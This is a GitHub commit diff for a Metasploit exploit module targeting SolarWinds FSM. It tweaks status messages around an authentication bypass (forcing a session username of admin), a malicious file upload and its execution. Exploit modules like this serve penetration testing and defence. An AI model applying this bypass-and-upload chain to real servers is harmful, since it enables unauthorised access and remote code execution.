Skip to content

Commit 0ee858c

Browse files
wchen-r7wchen-r7
committed
Some useful messages
1 parent 8ad07cd commit 0ee858c

File tree

1 file changed

+6
-2
lines changed

1 file changed

+6
-2
lines changed

modules/exploits/windows/http/solarwinds_fsm_userlogin.rb

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -79,7 +79,7 @@ def exploit
7979
end
8080

8181
username = 'admin'
82-
print_status("Putting session value: username=#{username}")
82+
print_status("Auth bypass: Putting session value: username=#{username}")
8383
sid = put_session_value('admin')
8484
print_status("Your SID is: #{sid}")
8585

@@ -127,8 +127,12 @@ def get_sid(res)
127127
def upload_exec(sid, filename, malicious_file)
128128
res = upload_file(sid, filename, malicious_file)
129129

130-
unless res
130+
if !res
131131
fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file')
132+
elsif res && res.body.include?('java.lang.NoClassDefFoundError')
133+
print_status("Payload being treated as XLS, indicates a successful upload.")
134+
else
135+
print_status("Unsure of a successful upload, but we're going to try to execute anyway")
132136
end
133137

134138
exec_file(sid, filename)

0 commit comments

Comments
 (0)